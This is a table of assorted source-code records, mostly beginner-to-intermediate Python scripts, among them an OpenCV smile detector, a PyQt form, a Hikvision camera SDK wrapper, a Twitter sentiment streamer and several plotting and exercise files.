index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
986,900 | 5ea8778ed55731df707beaa878df3c44bc6a5857 | import cv2
# Face classifier
face_detector = cv2.CascadeClassifier(r'C:/Users/ymatse/Smile_detector/haarcascade_frontalface_default.xml')
smile_detector = cv2.CascadeClassifier(r'C:/Users/ymatse/Smile_detector/haarcascade_smile.xml')
# Grab Webcam feed
webcam = cv2.VideoCapture(0)
# Show the current frame
while True:
# Read the current frame from the webcam video stream
successful_frame_read, frame = webcam.read()
# If there is an error, abort
if not successful_frame_read:
break
# Change to grayscale
frame_grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Detect faces first
faces = face_detector.detectMultiScale(frame_grayscale)
# Run face detection within each of those faces
for (x, y, w, h) in faces:
# Draw a rectangle around the face
cv2.rectangle(frame, (x, y), (x+w, y+h), (100, 200, 50), 4)
# Get the sub frame (using numpy N-dimensional array slicing)
the_face = frame[y:y+h , x:x+w]
# Change to grayscale
face_grayscale = cv2.cvtColor(the_face, cv2.COLOR_BGR2GRAY)
smiles = smile_detector.detectMultiScale(face_grayscale, scaleFactor=1.7, minNeighbors=20)
#Label this face as smiling
if len(smiles) > 0:
cv2.putText(frame, 'smiling', (x, y+h+40), fontScale=3, fontFace=cv2.FONT_HERSHEY_PLAIN, color=(255, 255, 255))
# Show the current frame
cv2.imshow('Why so serious?', frame)
#Display
cv2.waitKey(1)
# Cleaup
webcam.release()
cv2.destroyAllWindows()
|
986,901 | d0969c48fdf16bd31104d12dad1442806250fafd | #! /usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/7/23 9:32 AM
# @Author: zhangzhihui.wisdom
# @File:generator.py
# the method of creating generator :
# the first method : only change the list comprehension [] to {}
# L = [x * x for x in range(10)]
# g = (x * x for x in range(10)) L is a list,while g is a generator
def odd():
print('step 1')
yield 1
print('step 2')
yield 3
print ('step 3')
yield 5
if __name__ == '__main__':
L = [x * x for x in range(10)]
g = (x * x for x in range(10))
print(L)
print(g)
print("generator")
for n in g:
print(n)
o = odd()
print(next(o))
print(next(o))
# if function contains a yield, the function become a generator
# yield statement suspends function's execution and sends a value back to the caller
# but retains enough state to enable function to resume where it is left off
# when resumed, the function continues execution immediately after the last yield run.
# this allows its code to produce a series of values over time, rather than computing them at once
# and sending them back like a list
|
986,902 | 452350f342839e8e2a1fb1ae83e52fcb34de7773 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainwidget.ui'
#
# Created by: PyQt5 UI code generator 5.8.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_mainForm(object):
def setupUi(self, mainForm):
mainForm.setObjectName("mainForm")
mainForm.setWindowModality(QtCore.Qt.NonModal)
mainForm.resize(689, 338)
self.horizontalLayout = QtWidgets.QHBoxLayout(mainForm)
self.horizontalLayout.setObjectName("horizontalLayout")
self.cameraLabel = QtWidgets.QLabel(mainForm)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(5)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cameraLabel.sizePolicy().hasHeightForWidth())
self.cameraLabel.setSizePolicy(sizePolicy)
self.cameraLabel.setStyleSheet("background: black; color: rgb(128, 128, 128)")
self.cameraLabel.setAlignment(QtCore.Qt.AlignCenter)
self.cameraLabel.setObjectName("cameraLabel")
self.horizontalLayout.addWidget(self.cameraLabel)
self.controlWidget = QtWidgets.QWidget(mainForm)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(2)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.controlWidget.sizePolicy().hasHeightForWidth())
self.controlWidget.setSizePolicy(sizePolicy)
self.controlWidget.setObjectName("controlWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.controlWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.addDataWidget = QtWidgets.QWidget(self.controlWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(4)
sizePolicy.setHeightForWidth(self.addDataWidget.sizePolicy().hasHeightForWidth())
self.addDataWidget.setSizePolicy(sizePolicy)
self.addDataWidget.setObjectName("addDataWidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.addDataWidget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(3)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.capturedLabel = QtWidgets.QLabel(self.addDataWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(10)
sizePolicy.setHeightForWidth(self.capturedLabel.sizePolicy().hasHeightForWidth())
self.capturedLabel.setSizePolicy(sizePolicy)
self.capturedLabel.setStyleSheet("background: rgb(128, 128, 128); padding: 5")
self.capturedLabel.setAlignment(QtCore.Qt.AlignCenter)
self.capturedLabel.setWordWrap(True)
self.capturedLabel.setObjectName("capturedLabel")
self.verticalLayout_2.addWidget(self.capturedLabel)
self.nameLineEdit = QtWidgets.QLineEdit(self.addDataWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.nameLineEdit.sizePolicy().hasHeightForWidth())
self.nameLineEdit.setSizePolicy(sizePolicy)
self.nameLineEdit.setFocusPolicy(QtCore.Qt.ClickFocus)
self.nameLineEdit.setAlignment(QtCore.Qt.AlignCenter)
self.nameLineEdit.setDragEnabled(True)
self.nameLineEdit.setObjectName("nameLineEdit")
self.verticalLayout_2.addWidget(self.nameLineEdit)
self.addDataButton = QtWidgets.QPushButton(self.addDataWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.addDataButton.sizePolicy().hasHeightForWidth())
self.addDataButton.setSizePolicy(sizePolicy)
self.addDataButton.setObjectName("addDataButton")
self.verticalLayout_2.addWidget(self.addDataButton)
self.statusLabel = QtWidgets.QLabel(self.addDataWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.statusLabel.sizePolicy().hasHeightForWidth())
self.statusLabel.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(10)
self.statusLabel.setFont(font)
self.statusLabel.setAutoFillBackground(False)
self.statusLabel.setStyleSheet("color: rgb(128, 128, 128)")
self.statusLabel.setLineWidth(0)
self.statusLabel.setAlignment(QtCore.Qt.AlignCenter)
self.statusLabel.setObjectName("statusLabel")
self.verticalLayout_2.addWidget(self.statusLabel)
self.verticalLayout.addWidget(self.addDataWidget)
self.line = QtWidgets.QFrame(self.controlWidget)
self.line.setStyleSheet("")
self.line.setLineWidth(1)
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.verticalLayout.addWidget(self.line)
self.recognizeWidget = QtWidgets.QWidget(self.controlWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.recognizeWidget.sizePolicy().hasHeightForWidth())
self.recognizeWidget.setSizePolicy(sizePolicy)
self.recognizeWidget.setObjectName("recognizeWidget")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.recognizeWidget)
self.verticalLayout_3.setContentsMargins(0, 2, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.trainButton = QtWidgets.QPushButton(self.recognizeWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.trainButton.sizePolicy().hasHeightForWidth())
self.trainButton.setSizePolicy(sizePolicy)
self.trainButton.setObjectName("trainButton")
self.verticalLayout_3.addWidget(self.trainButton)
self.recognizeButton = QtWidgets.QPushButton(self.recognizeWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.recognizeButton.sizePolicy().hasHeightForWidth())
self.recognizeButton.setSizePolicy(sizePolicy)
self.recognizeButton.setStyleSheet("")
self.recognizeButton.setObjectName("recognizeButton")
self.verticalLayout_3.addWidget(self.recognizeButton)
self.widget = QtWidgets.QWidget(self.recognizeWidget)
self.widget.setObjectName("widget")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.thresholdLabel = QtWidgets.QLabel(self.widget)
self.thresholdLabel.setObjectName("thresholdLabel")
self.horizontalLayout_2.addWidget(self.thresholdLabel)
self.thresholdLineEdit = QtWidgets.QLineEdit(self.widget)
self.thresholdLineEdit.setFocusPolicy(QtCore.Qt.ClickFocus)
self.thresholdLineEdit.setObjectName("thresholdLineEdit")
self.horizontalLayout_2.addWidget(self.thresholdLineEdit)
self.verticalLayout_3.addWidget(self.widget)
self.verticalLayout.addWidget(self.recognizeWidget)
self.horizontalLayout.addWidget(self.controlWidget)
self.retranslateUi(mainForm)
QtCore.QMetaObject.connectSlotsByName(mainForm)
def retranslateUi(self, mainForm):
_translate = QtCore.QCoreApplication.translate
mainForm.setWindowTitle(_translate("mainForm", "JH Face"))
self.cameraLabel.setText(_translate("mainForm", "No Supported Camera"))
self.capturedLabel.setText(_translate("mainForm", "Enter name then click \"Add Training Image\" button to capture and add image to training data"))
self.nameLineEdit.setPlaceholderText(_translate("mainForm", "Name"))
self.addDataButton.setText(_translate("mainForm", "Add Training Image"))
self.statusLabel.setText(_translate("mainForm", "No Image Added"))
self.trainButton.setText(_translate("mainForm", "Train"))
self.recognizeButton.setText(_translate("mainForm", "RECOGNIZE"))
self.thresholdLabel.setText(_translate("mainForm", "Threshold:"))
|
986,903 | d73499ace5cddebddef6fbdbf6a59441b968c3b3 | import pandas as pd
import numpy as np
def get_ticker(ticker):
data = pd.read_csv('stock_data.csv')
cik = data[data['Ticker'] == ticker]['CIK'].item()
name = data[data['Ticker'] == ticker]['Name'].item()
exchange = data[data['Ticker'] == ticker]['Exchange'].item()
return cik, name, exchange |
986,904 | 5d35bca0c9ff731eea98971ff9f0545765440ec7 | # Write a program, which find all the numbers between 100 and 500
# such that each digit of the number is odd and then print the numbers.
# For example, 111 is the first number between 100 and 500 which all the digits are odd.
# you may want to use for loop, and list to program this task)
num1 = 100
num_list = []
while num1 <= 500: # while loop will execute until num1 is greater than or equal to 500
hundreds_digit = num1 // 100 # will produce the hundreds digit of num1
tens_digit = (num1 % 100) // 10 # will produce the tens digit of num1
ones_digit = num1 % 10 # will produce the ones digit of num1
hundreds_test = hundreds_digit % 2 # test to see if hundreds digit is even
tens_test = tens_digit % 2 # test to see if tens digit is even
ones_test = ones_digit % 2 # test to see if ones digit is even
# bool statements set to false for each digit test
hundreds_bool = False
tens_bool = False
ones_bool = False
# if the mod of each digit is not equal to zero, the bool test will be set to true (tests each digit)
if hundreds_test != 0:
hundreds_bool = True
else:
hundreds_bool = False
if tens_test != 0:
tens_bool = True
else:
tens_bool = False
if ones_test != 0:
ones_bool = True
else:
ones_bool = False
# if all digits are odd, add num1 to num_list
if ones_bool == True and tens_bool == True and hundreds_bool == True:
list.append(num_list, num1)
num1 = num1 + 1
else:
num1 = num1 + 1
print("The list of numbers between 100 and 500 in which each digit is odd:")
print(num_list) # print number list with all numbers in each digit
|
986,905 | 2ce82b829671a158eb392ad2eddd931a3ab1086f | import opennlpModels
from opennlpModels import SentenceDetector
from opennlpModels import Tokenizer
from opennlpModels import NameFinder
from opennlpModels import PosTagger
from opennlpModels import Chunker
a = Chunker()
a.setInputFile("tempBuffer/chunkerInput.txt")
a.run()
a.printOutput()
|
986,906 | 7485322804a283eef530d81725fe25b979f205c6 | from django.db import models
class Document(models.Model):
docfile = models.FileField(upload_to='videos/%Y/%m/%d')
|
986,907 | 4b203714d20dae8ded6b838427e3967ca71c868b | import numpy as np
import matplotlib.pyplot as plt
# 参考该 https://matplotlib.org/2.0.2/contents.html
x = np.linspace(-2*np.pi, 2*np.pi, 256)
# 画画sin和cos线
cos = np.cos(x)
sin = np.sin(x)
plt.plot(x, cos, '--', linewidth=2)
plt.plot(x, sin)
plt.show() |
986,908 | 06921893916f9c8f1d02d9e219a66e00b79c19ae | '''
Python Starter Code
>> python main.py
'''
import os
import requests
from datetime import datetime
URL = "https://lyft-vingkan.c9users.io"
TEAM = os.environ["TEAM_SECRET"]
'''
Helper Methods
'''
# Get Trips
def get_trips(query):
query["team"] = TEAM
response = requests.get(URL + "/trips/", params=query)
return response.json()
# Set Pricing
def set_pricing(pricing):
query = pricing;
query["team"] = TEAM;
response = requests.post(URL + "/pricing/", params=query)
return response.json()
# Set Power Zones
def set_zones(zones):
zone_list = (",").join(str(z) for z in zones)
query = {
"team": TEAM,
"zones": zone_list
}
response = requests.post(URL + "/zones/", params=query)
return response.json()
def string_to_date(datestring):
return datetime.strptime(datestring, "%Y-%m-%dT%H:%M:%S")
'''
Example Usage
'''
trips = get_trips({
"start": "9/10/2017 2:00 PM",
"end": "9/10/2017 3:00 PM",
"limit": 10
})
for trip in trips["response"]:
d = string_to_date(trip["trip_start_timestamp"])
time = d.strftime("%m/%d %r")
pickup = trip["pickup_community_area"]
dropoff = trip["dropoff_community_area"]
print("Trip at %s from area %s to %s" % (time, pickup, dropoff))
p = set_pricing({
"base": 3.40,
"pickup": 1.00,
"per_mile": 0.20,
"per_minute": 0.30
})
print(p)
z = set_zones([5, 6, 7])
print(z)
|
986,909 | f2eceb92ca4c86ce027b0a120f51ef3e244808e4 | # wrapper around python.platform
import platform
import getpass
def origin_hostname():
return getpass.getuser()
def origin_hardname():
return platform.node() |
986,910 | c88f06340bae9353130c64c1ee25be89474758fa | #demonstrate slice of strings
word="pizza"
print(word[:])
print(
"""
0 1 2 3 4 5
+--+--+--+--+--+
| p| i| z| z| a|
+--+--+--+--+--+
-5-4 -3 -2 -1
"""
)
print("Enter start and end index for slice 'pizza' which you want")
print("Press Enter to exit, not enter start index")
start=None
while start!="":
start=(input("\nStart index: "))
if start:
start=int(start)
finish=int(input("End index: "))
print("Slice word[",start,":",finish,"] looks like",end=" ")
print(word[start:finish])
input("\n\nPress enter to exit")
|
986,911 | 26f2663a148144af76f36e3f17ce9c5c7420f9ad | import os
import ctypes
import functools
from .hk_define import *
from .hk_struct import LPNET_DVR_DEVICEINFO_V30, NET_DVR_FOCUSMODE_CFG, NET_DVR_JPEGPARA
from .hikvision_infrared import get_temper_info
# 禁止使用logging模块
def _release_wrapper(func):
@functools.wraps(func)
def inner(*args, **kwargs):
res = func(*args, **kwargs)
if kwargs.get('release_resources', True):
if args[0].user_id != -1:
args[0]._destroy()
return res
return inner
class HIKVisionSDK(object):
def __init__(self, lib_dir, ip, username, password, port=8000, channel=1, debug=True):
self.lib_dir = lib_dir
self.old_cwd = os.getcwd()
self.ip = ip
self.username = username
self.password = password
self.port = port
self.user_id = -1
self.hk_so_lib = None
self.channel = channel
self.err_code = 0
self.debug = debug
def print_log(self, msg):
if self.debug:
print(msg)
def init(self):
"""raise a exception if error"""
self.print_log('开始改变工作目录 %s' % self.lib_dir)
os.chdir(self.lib_dir)
self.print_log('开始加载libhcnetsdk.so')
self.hk_so_lib = ctypes.cdll.LoadLibrary("./libhcnetsdk.so")
ok = self.hk_so_lib.NET_DVR_Init()
if not ok:
self.err_code = -1
raise Exception("<<<海康sdk初始化失败")
self._login()
return self
def _login(self):
self.print_log('开始登录')
device_info = LPNET_DVR_DEVICEINFO_V30()
result = self.hk_so_lib.NET_DVR_Login_V30(bytes(self.ip, 'ascii'),
self.port,
bytes(self.username, 'ascii'),
bytes(self.password, 'ascii'),
ctypes.byref(device_info))
if result == -1:
error_num = self.hk_so_lib.NET_DVR_GetLastError()
self.err_code = error_num
self._destroy(logout=False)
raise Exception("<<<海康SDK调用错误 ERRCODE: %s" % error_num)
self.print_log('登录成功')
self.user_id = result
def _destroy(self, logout=True):
if logout:
self.print_log('>>>开始注销资源')
res = self.hk_so_lib.NET_DVR_Logout(self.user_id)
if not res:
self.print_log('<<<User退出失败')
self.print_log('>>>开始释放资源')
res = self.hk_so_lib.NET_DVR_Cleanup()
if not res:
self.print_log('<<<释放资源失败')
os.chdir(self.old_cwd)
self.print_log('>>>成功还原工作目录 %s' % os.getcwd())
@_release_wrapper
def take_picture(self, pic_pathname, release_resources=True) -> bool:
if self.user_id == -1:
self.print_log('未初始化或者初始化失败')
return False
self.print_log('开始拍照 %s' % pic_pathname)
obj = NET_DVR_JPEGPARA()
result = self.hk_so_lib.NET_DVR_CaptureJPEGPicture(self.user_id,
self.channel,
ctypes.byref(obj),
bytes(pic_pathname, 'utf-8'))
if not result:
error_num = self.hk_so_lib.NET_DVR_GetLastError()
self.print_log('<<<拍照失败 ERRCODE: %s' % error_num)
return False
self.print_log('拍照成功')
return True
@_release_wrapper
def get_zoom(self, release_resources=True) -> int:
"""-1 if failure"""
if self.user_id == -1:
self.print_log('<<<未初始化或者初始化失败 user_id %s' % self.user_id)
return False
self.print_log('开始获取变焦')
struct_cfg = NET_DVR_FOCUSMODE_CFG()
dw_returned = ctypes.c_uint16(0)
result = self.hk_so_lib.NET_DVR_GetDVRConfig(self.user_id,
NET_DVR_GET_FOCUSMODECFG,
self.channel,
ctypes.byref(struct_cfg),
255,
ctypes.byref(dw_returned))
if not result:
self.print_log('<<<获取变焦失败')
return -1
self.print_log('value %s' % struct_cfg.fOpticalZoomLevel)
return struct_cfg.fOpticalZoomLevel
@_release_wrapper
def set_zoom(self, zoom, release_resources=True) -> bool:
if self.hk_so_lib == -1:
self.print_log('<<<未初始化或者初始化失败')
return False
self.print_log('开始设置变倍 zoom %s' % zoom)
struct_cfg = NET_DVR_FOCUSMODE_CFG()
dw_returned = ctypes.c_uint16(0)
result = self.hk_so_lib.NET_DVR_GetDVRConfig(self.user_id,
NET_DVR_GET_FOCUSMODECFG,
self.channel,
ctypes.byref(struct_cfg),
255,
ctypes.byref(dw_returned))
if not result:
self.print_log('<<<获取变倍失败')
return False
cur_zoom = struct_cfg.fOpticalZoomLevel
self.print_log("当前变倍值为 {} ".format(cur_zoom))
if cur_zoom == zoom:
self.print_log('已经是相同的倍值 %s' % cur_zoom)
return True
if cur_zoom == 0:
self.print_log('此摄像头不支持变焦')
return False
struct_cfg.fOpticalZoomLevel = ctypes.c_float(zoom)
result = self.hk_so_lib.NET_DVR_SetDVRConfig(self.user_id,
NET_DVR_SET_FOCUSMODECFG,
self.channel,
ctypes.byref(struct_cfg),
255)
if not result:
self.print_log('<<<变倍失败')
return False
self.print_log('success %s' % zoom)
return True
def get_infrared_value(self) -> tuple:
os.chdir(self.lib_dir)
self.print_log('开始获取红外')
try:
min_temper, max_temper, aver_temp = get_temper_info(ip=self.ip, username=self.username,
password=self.password)
except Exception as e:
self.print_log(e)
min_temper, max_temper, aver_temp = -1, -1, -1
self.print_log(" min_temper {0}, max_temper {1}, aver_temp {2}".format(min_temper, max_temper, aver_temp))
os.chdir(self.old_cwd)
return min_temper, max_temper, aver_temp
|
986,912 | d68581d367a957022d4555f7a30ed6d0e8a0214d | # Task 1
import time
class TrafficLight:
def __init__(self):
self._color_1 = 'red'
self._color_2 = 'yellow'
self._color_3 = 'green'
def running(self):
print(self._color_1)
time.sleep(7)
print(self._color_2)
time.sleep(2)
print(self._color_3)
time.sleep(5)
traffic_light = TrafficLight()
traffic_light.running()
|
986,913 | 939e5f5f713ef0e67ad9d75fd4e263cb59d814d5 | '''
本模块的任务是获取求职列表
'''
from spider4 import Spider4
import re #引入正则模块
from urllib import request #引入数据请求模块
class Spider3():
def __init__(self, url):
self.url = url
root_pattern = '"job_href":"([\s\S]*?)","job_name"' #相关信息正则表达式-类变量
'''
抓取数据方法fetch_content
'''
def fetch_content(self):
r = request.urlopen(self.url) #调用request的urlopen方法
htmls = r.read()
htmls = str(htmls,encoding='gbk',errors='ignore')
return htmls
'''
数据分析方法analysis
'''
def analysis(self, htmls):
root_html = re.findall(Spider3.root_pattern, htmls)
return root_html
def go(self):
htmls = self.fetch_content()
root_html = self.analysis(htmls)
return root_html
|
986,914 | 906448853099d29a8b7bdb906f77543e30feb154 |
#NLP Sentiment Analysis
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
from google.cloud import bigtable
#Import the necessary methods from tweepy library
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
#JSON parsing
import json
#UUID
import uuid
#Variables that contains the user credentials to access Twitter API
# URI scheme for Cloud Storage.
GOOGLE_STORAGE = 'gs'
# URI scheme for accessing local files.
LOCAL_FILE = 'file'
instance_id = 'crypto-farm-datastore'
project_id = 'crypto-sent-analysis'
column_family_id = 'twitter_farm'
client = bigtable.Client(project=project_id, admin=True)
instance = client.instance(instance_id)
def analyze(content):
"""Run a sentiment analysis request on text within a passed filename."""
client = language.LanguageServiceClient()
document = types.Document(
content=content,
type=enums.Document.Type.PLAIN_TEXT)
annotations = client.analyze_sentiment(document=document)
# Write results to GCS
return annotations.document_sentiment.score
#This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
def on_data(self, data):
parsed_data = json.loads(data)
text = parsed_data['text'].replace("\r","")
text = text.replace("\n","")
# score = analyze(text)
name = parsed_data['user']['name']
screen_name = parsed_data['user']['screen_name']
retweet_count = parsed_data['retweet_count']
fav_count = parsed_data['favorite_count']
followers_count = parsed_data['user']['followers_count']
timestamp_ms = parsed_data['timestamp_ms']
lang = parsed_data['lang']
row_key = uuid.uuid4()
row.set_cell(
column_family_id,
'name'.encode('utf-8'),
name.encode('utf-8'))
row.set_cell(
column_family_id,
'screen_name'.encode('utf-8'),
screen_name.encode('utf-8'))
row.set_cell(
column_family_id,
'retweet_count'.encode('utf-8'),
retweet_count.encode('utf-8'))
row.set_cell(
column_family_id,
'fav_count'.encode('utf-8'),
fav_count.encode('utf-8'))
row.set_cell(
column_family_id,
'followers_count'.encode('utf-8'),
followers_count.encode('utf-8'))
row.set_cell(
column_family_id,
'timestamp_ms'.encode('utf-8'),
timestamp_ms.encode('utf-8'))
row.set_cell(
column_family_id,
'lang'.encode('utf-8'),
lang.encode('utf-8'))
row.commit()
return True
def on_error(self, status):
print status
if __name__ == '__main__':
#This handles Twitter authetification and the connection to Twitter Streaming API
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
#This line filter Twitter Streams to capture data by the keywords: 'python', 'javascript', 'ruby'
stream.filter(track=['xrp', 'lumens', 'xlm'])
|
986,915 | e8b357b1c1407f393eef02b2b39245410909800e | #!/Library/Frameworks/Python.framework/Versions/3.9/bin/python3
from DoublyLinkedList import DoublyLinkedList
from os import system
import copy
listLinked=DoublyLinkedList(5)
option=1
while option!='0':
system("clear")
print('1. Insert End')
print('2. Delete First')
print('3. Get')
print('4. Show List')
print('0. Exit')
option=input("Enter the option: ")
if option=='1':
value=int(input('Enter the value: '))
listLinked.insertEnd(value)
elif option=='2':
listLinked.deleteFist()
elif option=='3':
value=int(input('Enter the value: '))
print(listLinked.getItem(value))
input("Press the <ENTER> key to continue...")
elif option=='4':
listLinked.showList()
input("Press the <ENTER> key to continue...")
#copy objets
# ex2 = copy.deepcopy(ex)
# ex2.insertEnd(4)
# ex.showList()
# ex2.showList() |
986,916 | 2c818fc974b5e158299ff498d9bd783cd6867224 | # Copyright (c) Huoty, All rights reserved
# Author: Huoty <sudohuoty@163.com>
import sys
from dnspx.cli import main
if __name__ == "__main__":
sys.argv[0] = "dnspx"
sys.exit(main())
|
986,917 | d9856f7143024c2ee72b463ab0e6e7b02dfb0436 | import matplotlib.pyplot as plt
import numpy as np
from score_post import time_basic_score
from taylorDiagram import plot_daylor_graph
from taylorDiagram import plot_daylor_graph_new
fontsize = 14
def plot_categories(fig0, obs, mod, j):
[h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs] = obs
[h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod] = mod
plt.rcParams.update({'font.size': 16})
data1 = h_obs[j, :][~h_obs[j, :].mask]
data2 = d_obs[j, :][~d_obs[j, :].mask]
data3 = m_obs[j, :][~m_obs[j, :].mask]
data4 = y_obs[j, :][~y_obs[j, :].mask]
h_t_obs, d_t_obs, m_t_obs, y_t_obs = h_t_obs[~h_obs[j, :].mask], d_t_obs[~d_obs[j, :].mask], m_t_obs[~m_obs[j, :].mask], y_t_obs[~y_obs[j, :].mask]
models1, models2, models3, models4 = [], [], [], []
for i in range(len(d_mod)):
models1.append(h_mod[i][j, :][~h_obs[j, :].mask])
models2.append(d_mod[i][j, :][~d_obs[j, :].mask])
models3.append(m_mod[i][j, :][~m_obs[j, :].mask])
models4.append(y_mod[i][j, :][~y_obs[j, :].mask])
fig0, sample1 = plot_daylor_graph(data1, models1, fig0, 422)
fig0, sample2 = plot_daylor_graph(data2, models2, fig0, 424)
fig0, sample3 = plot_daylor_graph(data3, models3, fig0, 426)
fig0, sample4 = plot_daylor_graph(data4, models4, fig0, 428)
ax0 = fig0.add_subplot(4, 2, 1)
ax1 = fig0.add_subplot(4, 2, 3)
ax2 = fig0.add_subplot(4, 2, 5)
ax3 = fig0.add_subplot(4, 2, 7)
# print(type(data1))
ax0.plot(h_t_obs, data1, 'k-', label='Observed')
ax1.plot(d_t_obs, data2, 'k-', label='Observed')
ax2.plot(m_t_obs, data3, 'k-', label='Observed')
ax3.plot(y_t_obs, data4, 'k-', label='Observed')
for i in range(len(h_mod)):
ax0.plot(h_t_obs, models1[i], '-', label= "Model "+str(i+1))
ax1.plot(d_t_obs, models2[i], '-', label= "Model "+str(i+1))
ax2.plot(m_t_obs, models3[i], '-', label= "Model "+str(i+1))
ax3.plot(y_t_obs, models4[i], '-', label= "Model "+str(i+1))
return fig0, ax0, ax1, ax2, ax3, [sample1, sample2, sample3, sample4]
def plot_new_categories(fig0, obs, mod, j, rect1, rect2, rect3, rect4, rect, ref_times):
[h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs] = obs
[h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod] = mod
plt.rcParams.update({'font.size': 16})
data1 = h_obs[j, :][~h_obs[j, :].mask]
data2 = d_obs[j, :][~d_obs[j, :].mask]
data3 = m_obs[j, :][~m_obs[j, :].mask]
data4 = y_obs[j, :][~y_obs[j, :].mask]
h_t_obs, d_t_obs, m_t_obs, y_t_obs = h_t_obs[~h_obs[j, :].mask], d_t_obs[~d_obs[j, :].mask], m_t_obs[~m_obs[j, :].mask], y_t_obs[~y_obs[j, :].mask]
models1, models2, models3, models4 = [], [], [], []
for i in range(len(d_mod)):
models1.append(h_mod[i][j, :][~h_obs[j, :].mask])
models2.append(d_mod[i][j, :][~d_obs[j, :].mask])
models3.append(m_mod[i][j, :][~m_obs[j, :].mask])
models4.append(y_mod[i][j, :][~y_obs[j, :].mask])
# fig0, sample1 = plot_daylor_graph(data1, models1, fig0, 422)
# fig0, sample2 = plot_daylor_graph(data2, models2, fig0, 424)
# fig0, sample3 = plot_daylor_graph(data3, models3, fig0, 426)
# fig0, sample4 = plot_daylor_graph(data4, models4, fig0, 428)
fig0, samples1, samples2, samples3, samples4 = plot_daylor_graph_new(data1, data2, data3, data4, models1, models2, models3, models4, fig0, rect=rect, ref_times=ref_times)
ax0 = fig0.add_subplot(rect1)
ax1 = fig0.add_subplot(rect2)
ax2 = fig0.add_subplot(rect3)
ax3 = fig0.add_subplot(rect4)
ax0.plot(h_t_obs, data1, 'k-', label='Observed')
ax1.plot(d_t_obs, data2, 'k-', label='Observed')
ax2.plot(m_t_obs, data3, 'k-', label='Observed')
ax3.plot(y_t_obs, data4, 'k-', label='Observed')
for i in range(len(h_mod)):
ax0.plot(h_t_obs, models1[i], '-', label="Model " + str(i + 1))
ax1.plot(d_t_obs, models2[i], '-', label= "Model " + str(i + 1))
ax2.plot(m_t_obs, models3[i], '-', label= "Model " + str(i + 1))
ax3.plot(y_t_obs, models4[i], '-', label= "Model " + str(i + 1))
# fig0.legend(line,labels, loc='upper left')
ax0.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
return fig0, ax0, ax1, ax2, ax3, [samples1, samples2, samples3, samples4]
class basic_post(object):
def __init__(self, variable, site_name, filedir):
self.variable = variable
self.sitename = site_name
self.filedir = filedir
